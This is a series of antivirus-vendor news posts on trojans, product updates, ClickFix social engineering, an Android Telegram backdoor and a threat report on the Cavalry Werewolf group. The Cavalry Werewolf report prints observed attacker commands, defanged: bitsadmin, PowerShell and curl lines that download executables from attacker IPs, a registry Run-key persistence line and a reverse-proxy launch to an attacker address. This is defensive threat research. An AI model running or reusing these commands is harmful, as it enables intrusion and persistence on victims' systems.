Every time the trojan opens a link from the search results and performs clicks on the loaded webpage, it either returns to the previous browser tab or proceeds to the next one, depending on the task. These actions are repeated until the click limit for the target websites is exhausted.

Below are examples of websites that the trojan was commanded to interact with in tasks received from the C2 server:

For detailed technical descriptions of the ChimeraWire trojan and the malware involved in its download, please refer to the PDF version of the study or visit the Doctor Web virus library.

More details about Trojan.ChimeraWire
More details about Trojan.DownLoader48.54600
More details about Trojan.Starter.8377
More details about Python.Downloader.208
More details about Trojan.DownLoader48.54318
More details about Trojan.DownLoader48.61444

Conclusion

As of now, Trojan.ChimeraWire's malicious activity essentially boils down to performing relatively simple clicker tasks to boost the popularity of websites. At the same time, the functionality of the tools that the trojan is based on allows it to perform a wider range of tasks, including automated actions under the guise of real user activity. For instance, malicious actors can utilize it to fill out web forms on various sites, including those conducting surveys for advertising purposes. In addition, they can use the trojan for reading the contents of webpages and taking screenshots of them — both for the purposes of cyber espionage and for automated data collection to build various databases (e.g., with emails, phone numbers, etc.).

Thus, we can expect new Trojan.ChimeraWire versions to emerge in the future, in which these and other features will be fully implemented. Doctor Web’s specialists continue to monitor the trojan’s evolution.

MITRE ATT&CK®

We analyzed Trojan.ChimeraWire using the MITRE ATT&CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:

Stage	Technique
Execution	User Execution (T1204) Malicious File (T1204.002) Malicious Library (T1204.005) PowerShell (T1059.001) Windows Command Shell (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Scheduled Task (T1053.005)
Persistence	Registry Run Keys / Startup Folder (T1547.001) Scheduled Task/Job (T1053)
Privilege Escalation	Hijack Execution Flow: DLL (T1574.001) Bypass User Account Control (T1548.002)
Defense Evasion	Encrypted/Encoded File (T1027.013) Debugger Evasion (T1622) Hidden Window (T1564.003) File/Path Exclusions (T1564.012) Deobfuscate/Decode Files or Information (T1140) Hijack Execution Flow: DLL (T1574.001)
Command and Control	Bidirectional Communication (T1102.002) Web Protocols (T1071.001)

Indicators of compromise

Dr.Web CureIt! can now see what malware is trying to hide

Thu, 20 Nov 2025 08:00:25 GMT

Doctor Web has updated its free utility Dr.Web CureIt! to introduce a unique feature—the ability to scan files and folders that virus makers add to antivirus exclusions lists. This is a major step in tackling more sophisticated threats that seek to disable information security software to ensure they operate unhindered in the system.

The new feature was inspired by the success of Dr.Web FixIt!—the product employed by Doctor Web's experts to investigate information security incidents and eliminate complex infections. Many malicious programs attempt to add their own executable files to the antivirus exclusions list as soon as they get into a system. By doing so, they deceive the antivirus and make it ignore malicious objects, which allows attackers to steal data, encrypt files or use the device as a botnet node.

How the new feature works:

When the scan is started, Dr.Web CureIt! will automatically examine the exclusions lists of Microsoft Defender or any other antivirus found in the system.
Then all files and folders found on these lists are thoroughly scanned by the Dr.Web antivirus engine.
If a malicious object is detected among the exclusions, Dr.Web CureIt! notifies the user and removes the threat.

This feature can be of vital importance for ordinary users who may be unaware that their security software has been compromised. Now, even if a trojan is hiding in plain sight, Dr.Web CureIt! will be able to expose and neutralize it.

What’s coming next: emergency expert aid for Linux

Driven by the success of Dr.Web FixIt! under Windows, Doctor Web is also planning to release a full-blown version of the service for Linux to help information security professionals investigate cyberattacks on corporate infrastructures.
Currently you can use Dr.Web FixIt! for Linux to collect system information and send it to our technical support engineers. The utility is now available at https://free.drweb.ru/sysinfo/
The new service’s design features will subsequently be used to create a Dr.Web CureIt! version that will enable ordinary users to quickly scan their Linux machines and eliminate any consequences of infection.

You can download the updated version of Dr.Web CureIt! free of charge on our official website: https://free.drweb.com/download+cureit+free/

*Available free of charge for home use only.

Protect your loved ones from phone scams with the new Anti-scam feature

Tue, 18 Nov 2025 08:45:29 GMT

Dr.Web Family Security—a mobile app that helps you keep your children and adult family members safe in the digital world—has been enhanced to include the Anti-scam feature, providing even more reliable protection from phone scams and blackmail.

How the Anti-scam works

It helps you keep your finger on the pulse. As the family manager, you can set a duration limit for calls from numbers that are either hidden or not found on the Contacts list. For example, you can keep them as short as just one minute. That’s sufficient time to say “hello” but not nearly enough time to coerce the target into divulging a valuable piece of information.
It aborts scammer attacks at their outset. The shorter the conversation, the lower the chance of an attacker being able to gain your family member’s trust to obtain transaction confirmation codes from SMS; bank card data; or passwords. You’re taking away their most vital resource —time.
It makes sure your family members will never miss the things that matter. If an important call gets cut short by the filter, simply add the number to the Allowed lists—and all subsequent calls from that number will never get interrupted by Dr.Web. Maintain full control and stay connected.

This release also incorporates stability and performance upgrades for the app.
The latest Dr.Web Family Security version is already available on Google Play and will appear on Doctor Web’s site drweb.com and on AppGallery shortly. Keep an eye on your update notifications!

Updated version of Dr.Web for mobile devices comes with a smart security system

Fri, 07 Nov 2025 09:00:00 GMT

Updated antivirus products for protecting Android-based smartphones, tablets and other mobile devices have been released. The main improvements concern the automation of the protection and operational stability.

What makes this release special?

The new automated threat-processing feature allows Dr.Web solutions to remove malicious objects and to block suspicious links or isolate potentially dangerous applications without delays and manual user intervention.

What does this mean for users?

Now users of personal devices do not need to monitor all of the threat notifications as they did before because manual responses can be completely eliminated. This feature has been designed to ensure that the antivirus product’s response won't depend on the user's response to system notifications about detected threats and the actions that have been performed with them. The intelligent system, developed by Doctor Web specialists, independently eliminates threats in real time in accordance with the parameters specified for responding to certain types of malware.
Corporate users will especially enjoy this feature. The automated removal of malicious objects and the blocking of suspicious links and many other actions occur instantly without the direct participation of administrators. This feature is also supported by the Control Center.

Administration has become even more convenient

This update delivers the ability to centrally manage the actions of the Scanner and SpIDer Guard components when various types of threats are detected on Android-based devices. Now the administrator can configure how the Dr.Web agent will respond to threats — notify, delete or ignore them, depending on the category.

Important notice!

Starting with the new version, support is no longer available for Android version 4.4. Please pay attention to this when updating the product.
If you are using the Dr.Web Security Space version for mobile devices and downloaded it from Doctor Web's official website, you must completely reinstall the application in order to update it — download the latest version of the agent and install it.
For users of Dr.Web Security Space for mobile devices who downloaded the application from Google Play and who are using Dr.Web subscriptions or Dr.Web Mobile Security Suite, the update will proceed as usual.

Dr.Web Enterprise Security Suite and Dr.Web Industrial centralized management servers have been updated

Fri, 07 Nov 2025 09:00:00 GMT

A new update for Dr.Web Enterprise Security Suite and Dr.Web Industrial servers has been released. The new version delivers stability improvements and new tools for centrally managing actions when threats are detected on Android devices. To gain all of the new benefits and for correct system operation, users are recommended to update their servers to the latest version.

The new version of the Dr.Web Enterprise Security Suite server includes changes that improve security-system management. Changes have also occurred in Dr.Web for Android mobile devices — these ensure that the Control Center has full control of the antivirus protection.

This update delivers the ability to centrally manage the actions of the Scanner and SpIDer Guard components when various types of threats are detected on Android devices. Now the administrator can configure how the Dr.Web agent will respond to threats — notify, delete or ignore them, depending on the category.

The settings previously presented as the parameters "Scan for adware" and "Scan for potentially dangerous programs" have been replaced by a new mechanism for customising actions. If these scan parameters are disabled, after the update, the default action "Ignore" will be applied to the corresponding programs. In other cases, the "Report" action is used.

Important notice for users

To take advantage of the full range of the new version’s features and to ensure that the protection components operate correctly, the centralized management servers must be updated to the latest version.
The update is available for download via the management console’s web interface.
If antivirus network administrators have any questions on how to configure or plan the update, they can contact our Technical Support Service for a consultation.

Cavalry Werewolf hacker group attacks Russian state institutions

Thu, 06 Nov 2025 00:00:00 GMT

Download PDF

November 6, 2025

Introduction

In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data.

During the examination, our experts successfully identified previously unknown malware, including open-source tools. Among them were various backdoors that allow commands to be executed remotely on attacked systems and the background to be prepared for reconnaissance and further anchoring into the network infrastructure.

In this study, we will discuss the Cavalry Werewolf tools that we discovered and consider the features of this hacker group and the typical actions that these cybercriminals perform in compromised networks.

General information about the attack and the tools involved

To gain initial access to one of the computers, the threat actors utilized a common attack vector: phishing emails with malware disguised as documents attached. In this particular case, the messages contained BackDoor.ShellNET.1, a backdoor that was unknown at the time of the attack. This malware is based on Reverse-Shell-CS open-source software. It allows infected systems to be connected to remotely via a reverse shell and commands to be executed. This backdoor was located in a password-protected archive and had different names, depending on the particular phishing campaign involved.

Name variants for BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

An example of a phishing email containing BackDoor.ShellNET.1. The attackers offer the potential victim a “document” to read and provide a password that can be used to unpack the archive

Using BackDoor.ShellNET.1, the threat actors continued to get anchored into the target system. They downloaded several malicious apps through the standard Windows tool Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe)—for managing file transfer tasks. This program was launched with a set of certain command-line keys and on behalf of the current system administrator, as shown in the example below:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

The first threat downloaded with BackDoor.ShellNET.1 was the Trojan.FileSpyNET.5 trojan stealer. The cybercriminals used it to download documents stored on the computer in .doc, .docx, .xlsx, and .pdf formats; text files (.txt); and images (.jpg, .png).

Next, the attackers installed BackDoor.Tunnel.41 (backdoor malware that is ReverseSocks5 open-source software) to create SOCKS5 tunnels and inconspicuously connect to the computer in order to then execute commands on it, including one permitting the installation of other malware.

Cavalry Werewolf tools

Our investigation into this incident allowed us to uncover not only the aforementioned malware, but also many other of this criminal group’s tools that hackers use to carry out targeted attacks. It should be noted that Cavalry Werewolf malware creators do not limit themselves to a single set of malicious apps and are constantly expanding their arsenal. For this reason, the tools for penetrating target systems can vary, as can the next stages in the infection chain, depending on which institution is being attacked.

The entry point

Malicious programs in Cavalry Werewolf’s phishing emails are the first stage in the infection chain. At the same time, they can be represented by different malware types. Doctor Web’s virus analysts identified the following variants:

scripts (BAT.DownLoader.1138);
executable files (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

This is a batch file that downloads PowerShell.BackDoor.109, PowerShell backdoor malware, into the target system. With its help, the threat actors download and run other malware on the computer.

Known file names for BAT.DownLoader.1138	SHA1 hash	С2 server
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

This trojan installs the BackDoor.Spy.4033 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Known file names for Trojan.Packed2.49708	SHA1 hash	С2 server
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

This trojan installs the BackDoor.Spy.4038 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Functionality-wise, Trojan.Siggen31.54011 is similar to the Trojan.Packed2.49708 malware, but it has a slightly different payload-extraction algorithm.

SHA1 hash	С2 server
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

This backdoor executes tasks received from the attackers and is controlled via a Telegram bot. The main functionality of this malware is located in the PowerShell code hidden in its body.

Known file names for BackDoor.Siggen2.5463	SHA1 hash	The payload
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

This backdoor allows malicious actors to remotely connect to infected computers via a reverse shell to execute various commands.

Known file names for BackDoor.RShell.169	SHA1 hash	С2 server
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

This backdoor enables a reverse shell and gives threat actors remote access to the system.

Known file names for BackDoor.ReverseShell.10	SHA1 hash	С2 server
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

The next infection stages

We have uncovered the following malicious programs that can be installed on infected devices after they have been compromised:

Trojan.Inject5.57968

This is a trojan app with a backdoor encrypted in its body. This backdoor allows the attackers to download malicious programs on the infected computer. The payload is decrypted in several steps. In one of them, a malicious data array is injected into the process of the aspnet_compiler.exe program, which is part of the Microsoft .NET Framework package. Eventually, the completely decrypted backdoor operates in the context of this legitimate app’s process.

Studying Trojan.Inject5.57968’s activity, using the “sandbox” of the Dr.Web vxCube interactive threat analyzer

Known file names for Trojan.Inject5.57968	SHA1 hash	С2 server	The payload
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

A backdoor that is controlled via a Telegram bot and executes the attackers’ commands.

Known file names for BackDoor.ShellNET.2	SHA1 hash
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

A backdoor based on the ReverseSocks5 open-source software. It enables a SOCKS5 proxy in the infected system to provide remote access to the computer. BackDoor.ReverseProxy.1 is launched via the command interpreter cmd.exe with the parameter -connect IP to connect to the target address. There are modifications of this backdoor with hardcoded addresses.

The following IPs have been detected:

78[.]128.112[.]209 (specified in the launching command)
96[.]9.125[.]168 (specified in the launching command)
188[.]127.231[.]136 (hardcoded in the code)

Known file names for BackDoor.ReverseProxy.1	SHA1 hash
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 is the detection name for the trojan versions of legitimate programs in which the attackers have implanted malicious code. Doctor Web’s malware analysts encountered malicious modifications of the WinRar and 7-Zip archivers, the Visual Studio Code development tool, AkelPad text-editing software, and some other apps. Among them, for instance, was the Sumatra PDF Reader program which the cybercriminals passed off as MAX messenger. Such modifications are no longer able to carry out their main functionality and, when launched, can only initialize the implanted trojan component.

Depending on the cybercriminals’ goals, these modifications can carry all sorts of malware. Among them are:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Known file names for Trojan.Packed2.49862	SHA1 hash	С2 server	The payload
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram bot	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram bot	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram bot	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Typical actions performed by this group in a compromised network

Once the attackers penetrate the target organization’s computer infrastructure, they can perform various actions involving data collection and getting further anchored into the system.

To collect information about the infected computer, they execute these commands:

whoami — to get information about the current user;
dir C:\\users\\<user>\\Downloads — to get the list of files located in the “Downloads” directory of the current user;
dir C:\\users\\public\\pictures\\ — to get the list of files in the “Pictures” directory from a shared catalog (in order to determine which malicious programs have already been downloaded into the system);
ipconfig /all — to get the network configuration;
net user — to get a list of all of the users in the system.

They use the following commands to collect information about the proxy server and to check the network’s functionality:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

To configure the network, they use:

a command-line tool netsh, which is included in the Windows OS.

To subsequently deliver malicious tools into the system, they use legitimate tools:

PowerShell (for example: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (for example: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (for example: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

To get anchored in the system:

They can modify the Windows registry (for example: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

They use the command-line interpreter cmd.exe to launch their tool. For example:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — to launch BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — to launch BackDoor.Tunnel.41.

They can use PowerShell to delete their tools. For example:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Threat actors can also periodically check whether C2 servers are available, using the command ping.

Features of the Cavalry Werewolf hacker group

The following features of the Cavalry Werewolf hacker group can be highlighted:

they prefer using open-source software, both in its original form and as the basis for developing their own tools;
their main tools are various reverse-shell backdoors that allow commands to be executed remotely in infected systems;
they can embed malicious code into initially harmless programs;
they often use the Telegram API to control infected computers;
they use compromised email addresses and carry out phishing campaigns, sending emails under the guise of state institutions to distribute the first infection stage;
they use directories C:\\users\\public\\pictures, C:\\users\\public\\libraries, and C:\\users\\public\\downloads to download subsequent infection stages to the target device.

For detailed technical descriptions of identified Cavalry Werewolf tools, please refer to the PDF version of the study or visit the Doctor Web virus library.

MITRE matrix

Stage	Technique
Initial access	Spearphishing attachment (T1566.001)
Execution	User execution (T1204) PowerShell (T1059.001) Windows Command Shell (T1059.003)
Persistence	Registry Run Keys / Startup Folder (T1547.001) BITS Jobs (T1197)
Privilege Escalation	Bypass User Account Control (T1548.002)
Defense Evasion	BITS Jobs (T1197)
Command and Control	External Proxy (T1090.002) Bidirectional Communication (T1102.002)
Exfiltration	Exfiltration Over C2 Channel (T1041) Exfiltration Over Web Service (T1567)

Indicators of compromise

Dr.Web solutions support all versions of Windows, starting with Windows XP

Thu, 30 Oct 2025 15:23:15 GMT

Because Microsoft officially discontinued its support for Windows 10 as of October 14, 2025, Doctor Web is informing its users and partners of the following.

Support for Dr.Web products installed on computers running Windows 10
Currently, all versions of Dr.Web solutions are fully compatible with Windows 10. We confirm that:

Technical support and updates for Dr.Web antivirus databases and software components are available as usual;
With Microsoft support officially discontinued, Doctor Web is continuing to ensure that its products are compatible with Windows 10—for as long as this is possible, taking into account security requirements.

Long-term support for all versions, starting with Windows XP
Even though many Windows versions lack official support, they are still actively being used in individual infrastructures—including in industry, automated control systems and specialized corporate environments.
Taking into account the needs of these users, Doctor Web is continuing to provide support for all OS versions, starting with Windows XP, in current versions of Dr.Web solutions for PC protection.

! Please note that using outdated versions of OSs is associated with certain risks.

The lack of security updates leaves vulnerabilities unclosed.
Compatibility issues connected with modern versions of application software (browsers, drivers, etc.).
Increased risk of compromise—exploits for older operating systems are widely available in open sources, and cybercriminals are still carrying out attacks on vulnerable protocols (SMBv1, TLS 1.0, etc.).

Even if your company's business processes are critically dependent on these systems, it is strongly recommended that you plan to migrate to modern operating systems that provide security updates.
For any period that you are using outdated OS versions, you need to isolate nodes containing OS data from the Internet and your main corporate network segments through the use of VLAN, DMZ or firewalls, and you must carefully scan the entire data exchange process involving these systems for malicious content.

Understanding the ClickFix attack

Fri, 24 Oct 2025 10:52:52 GMT

Users all over the world are getting increasingly worried as the number of ClickFix security incidents continues to grow at an alarming rate. Attackers are using this social engineering technique to coax users into running malicious code on their devices.

An attack commences when someone winds up on a compromised or bogus site and sees a warning message informing them that, for example, the webpage can't be displayed properly because of a browser error or that an update is required.
Normally, the message is supplemented by a “Fix”, “Check” or “Update” button. Malicious code is copied into the clipboard automatically as soon as the button appears on the screen—there’s no need to even press it. The user is then prompted to paste this code into a command prompt or the “Run” dialogue box. As soon as that happens, a malicious program is installed and launched. And since the action has been initiated by the user, the antivirus often does not intervene.

Below we provide a simplified recreation of a ClickFix attack.

When users load and view content, a warning message suddenly appears in the browser, informing them that an issue caused by a recent browser update is preventing the content from being displayed properly.

The message suggests that the user perform these specific actions to resolve it:

Click the “Fix it!” button.
Right-click on the Windows Start button.
In the program list, locate Windows PowerShell and open it with administrator permissions.
Right-click to paste the clipboard contents into the terminal window and run the command.

As the user presses the button, a malicious script gets copied to the clipboard to be run in the terminal window.

The script establishes a remote connection to a C2 infrastructure that the perpetrators use to remotely control compromised systems.
In this case, the device gets connected to a remote C2 host, and then the payload is downloaded to the user's computer. After that, the malicious executable designed to modify the hosts file is launched, and the running script is ended.
Thanks to its preventive protection technologies, Dr.Web is able to detect the threat as soon as the script attempts to start the executable.
A fake CAPTCHA is another ruse commonly used in ClickFix attacks. A supposedly legitimate CAPTCHA verification box appears on the screen, and in the meantime, malicious code is covertly copied to the clipboard. By engaging users in interacting with malicious content under the pretext of verifying that they’re a real person, the perpetrators make it more likely for the attack to succeed.

The CAPTCHA dialogue is then replaced by instructions for additional verification steps.

By completing them, the unsuspecting user runs a malicious script that opens up a remote access route for the attackers.

Why ClickFix attack are hard to expose

When a user clicks a button on a bogus site, there is not yet any malicious pattern for an antivirus to detect. At first, all the actions appear quite legitimate: the user copies and pastes commands with their own hands and runs them—seemingly going through regular system routines.
The detection occurs later—when a malicious file is launched or if the script attempts to inject malicious code into other processes in the system. That’s when an antivirus sees the danger and eliminates it. In other words, protection technologies only spring into action at the post-exploitation phase when the malware is already performing its tasks by disrupting other processes or is behaving strangely.
Usually, by this time, the attacker has been able to connect to the victim's system and the payload is already deployed and can disguise itself as a legitimate process.
At this stage, the attacker can:

Elevate their privileges,
Collect data,
Navigate through the network,
Attempt to disable the antivirus.

On top of that, the malicious code can also be encrypted or obfuscated to make it less recognisable by conventional security routines.

Why it is important to act as early as possible

In the case of ClickFix incidents, preventing attackers from connecting to the system remotely can be as vital as responding to the actual threat. The extra security measures that may help accomplish this include:

Examining the clipboard contents whenever a suspicious message that includes commands (such as PowerShell scripts) appears in the browser.
Analysing traffic and suspicious attempts to establish a remote connection.
Teaching users how to recognise social engineering techniques by examining real attack scenarios.

Baohuo, the gray eminence. Android backdoor hijacks Telegram accounts, gaining complete control over them

Thu, 23 Oct 2025 10:32:20 GMT

October 23, 2025

Doctor Web has identified a dangerous backdoor, Android.Backdoor.Baohuo.1.origin, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, Android.Backdoor.Baohuo.1.origin can conceal connections from third-party devices in the list of active Telegram sessions. Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, also concealing these actions. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with Android.Backdoor.Baohuo.1.origin has exceeded 58,000.

Android.Backdoor.Baohuo.1.origin started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.

These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertizing text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window) as well as by reviews from supposedly happy users that the threat actors actually composed. It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.

One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating

Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.

Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of Android.Backdoor.Baohuo.1.origin. At the same time, the total number of infected devices has exceeded 58,000. Around 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers have been infected.

Countries with the highest number of devices infected with Android.Backdoor.Baohuo.1.origin (according to Doctor Web’s anti-virus laboratory)

However, malicious websites are not the only source for Android.Backdoor.Baohuo.1.origin’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. We have notified the online platforms where the trojanized versions of Telegram X were found.

The modified Telegram X with Android.Backdoor.Baohuo.1.origin implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer

Doctor Web’s anti-virus laboratory discovered several Android.Backdoor.Baohuo.1.origin variations, which can be conditionally divided into 3 main modification groups:

versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;
versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;
versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.

Regardless of the modification type, Android.Backdoor.Baohuo.1.origin initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.

When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.

Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.

If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.

The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to Android.Backdoor.Baohuo.1.origin the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. This is the first known case of using Redis to control Android malware.

When launched, Android.Backdoor.Baohuo.1.origin connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.

Android.Backdoor.Baohuo.1.origin regularly connects to the C2 server via API requests and can receive the following tasks:

upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;
upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;
receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;
receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);
request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);
request an URL from the C2 server to download an update for Telegram X;
request from the C2 server a configuration which is then saved as a JSON file;
request information about the Redis database;
upload information about the device to the C2 server whenever messenger network activity is detected;
receive from the C2 server a list of bots that are to be added to the Telegram contact list;
upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
every minute, request commands in the same format as the commands from the Redis database.

